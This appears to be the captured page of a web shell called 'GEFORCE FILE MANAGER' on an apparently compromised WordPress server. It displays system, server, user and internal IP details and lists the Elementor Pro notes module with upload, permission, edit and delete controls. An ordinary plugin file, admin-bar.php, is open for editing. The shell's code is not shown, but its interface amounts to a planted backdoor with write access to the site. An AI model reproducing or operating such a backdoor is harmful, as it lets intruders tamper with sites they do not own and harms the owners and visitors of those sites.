[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
notes
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 assets
SET
[ DEL ]
📁 data
SET
[ DEL ]
📁 database
SET
[ DEL ]
📁 editor-one-menu-items
SET
[ DEL ]
📁 notifications
SET
[ DEL ]
📁 user
SET
[ DEL ]
📄 admin-bar.php
672 B
SET
[ EDIT ]
|
[ DEL ]
📄 admin-page.php
4,082 B
SET
[ EDIT ]
|
[ DEL ]
📄 document-events.php
2,757 B
SET
[ EDIT ]
|
[ DEL ]
📄 module.php
6,491 B
SET
[ EDIT ]
|
[ DEL ]
📄 usage.php
7,981 B
SET
[ EDIT ]
|
[ DEL ]
📄 utils.php
2,412 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: admin-bar.php
<?php namespace ElementorPro\Modules\Notes; use ElementorPro\Modules\Notes\User\Capabilities; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Admin_Bar { /** * Register actions and hooks. * * @return void */ public function register() { add_action( 'admin_bar_menu', function ( \WP_Admin_Bar $wp_admin_bar ) { if ( is_admin() || ! current_user_can( Capabilities::READ_NOTES ) ) { return; } $wp_admin_bar->add_node( [ 'id' => 'elementor_notes', 'title' => esc_html__( 'Notes', 'elementor-pro' ), 'href' => '#', // Click event is handled by JS. ] ); }, 200 ); // Before "Elementor Debugger". } }